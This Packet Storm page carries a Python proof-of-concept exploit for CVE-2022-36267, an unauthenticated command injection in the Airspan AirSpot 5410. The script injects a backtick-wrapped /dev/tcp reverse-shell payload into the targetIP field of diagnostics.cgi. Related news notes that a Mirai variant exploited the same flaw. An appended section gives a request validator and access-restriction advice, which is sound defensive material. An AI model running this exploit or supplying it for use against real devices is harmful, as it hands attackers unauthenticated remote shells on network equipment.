AirSpot 5410 0.3.4.1-4 Remote Command Injection

AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.

Packet Storm
```python
# -*- coding: utf-8 -*-

# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def banner():
  airspanLogo = """
       ,-.
      / \  `.  __..-,O
     :   \ --''_..-'.'
     |    . .-' `. '.
     :     .     .`.'
      \     `.  /  ..
       \      `.   ' .
        `,       `.   \
       ,|,`.        `-.\
      '.||  ``-...__..-`
       |  | Airspan
       |__| AirSpot 5410
       /||\ PWNED x_x
      //||\\
     // || \\
  __//__||__\\__
 '--------------'
 Necrum Security Labs
                        \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m
         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m
         FOR EDUCATIONAL PURPOSE ONLY.
  """
  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

def pingWebInterface(RHOST, RPORT):
  # Reachability check: the web interface must answer HTTP 200 over HTTPS.
  url = 'https://{}:{}'.format(RHOST, RPORT)
  try:
    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
    if response.status_code != 200:
      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
      exit()
    print('[INFO] Airspan device web interface seems reachable!')
  except:
    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
    exit()

def execReverseShell(RHOST, RPORT, LHOST, LPORT):
  # The backtick-wrapped command is appended to the targetIP field of the
  # pingDiagnostic request; no session or credentials are sent.
  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
  try:
    print('[INFO] Executing reverse shell...')
    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
    return
  except Exception as e:
      # .format() belongs on the string, not on the return value of print()
      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}".format(LHOST, LPORT))
      return False

def main():
  banner()
  args = parser.parse_args()
  pingWebInterface(args.RHOST, args.RPORT)
  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)

if __name__ == "__main__":
  parser = argparse.ArgumentParser(description='Script PoC that exploits an unauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
  main()
```

Related news

Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks

By Waqas. The V3G4 malware was caught leveraging several vulnerabilities in IoT devices to spread its infection from July to December of 2022. This is a post from HackRead.com.

CVE-2022-36267: Airspan-AirSpot-5410.md

In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists an unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious HTTP request by injecting code in one of the parameters, allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi, which accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.
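The input check that the description says diagnostics.cgi lacks can be applied in front of the device (reverse proxy, WAF rule, or log review). The following is an added example, not code from the original page or from the vendor. The endpoint path and field names come from the PoC request above; the function names, the requirement that `targetIP` be an IP literal, and the five-digit limit on numeric fields are assumptions.

```python
import ipaddress
from urllib.parse import parse_qsl

ENDPOINT = "/cgi-bin/diagnostics.cgi"  # path named on this page

def _is_ip(value):
    """True only for a bare IPv4/IPv6 literal (assumed policy for targetIP)."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def _is_small_int(value):
    """True for 1 to 5 ASCII digits (assumed bound for the numeric fields)."""
    return value.isascii() and value.isdigit() and len(value) <= 5

# Fields of the pingDiagnostic request as they appear in the PoC.
VALIDATORS = {
    "targetIP": _is_ip,
    "packetSize": _is_small_int,
    "timeOut": _is_small_int,
    "count": _is_small_int,
}

def inspect_request(method, path, body):
    """Return [(field, decoded_value), ...] for every field that fails its check.

    An empty list means the request is either not a pingDiagnostic call
    or all of its fields have the expected shape.
    """
    if method != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []
    # parse_qsl percent-decodes values and keeps repeated fields, so a
    # second targetIP smuggled after a clean one is checked as well.
    fields = parse_qsl(body, keep_blank_values=True)
    if ("Command", "pingDiagnostic") not in fields:
        return []
    findings = []
    for name, value in fields:
        check = VALIDATORS.get(name)
        if check is not None and not check(value):
            findings.append((name, value))
    return findings
```

Because the endpoint accepts unauthenticated requests, any non-empty result is worth alerting on regardless of source address. Restricting network access to the management interface remains the primary mitigation.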
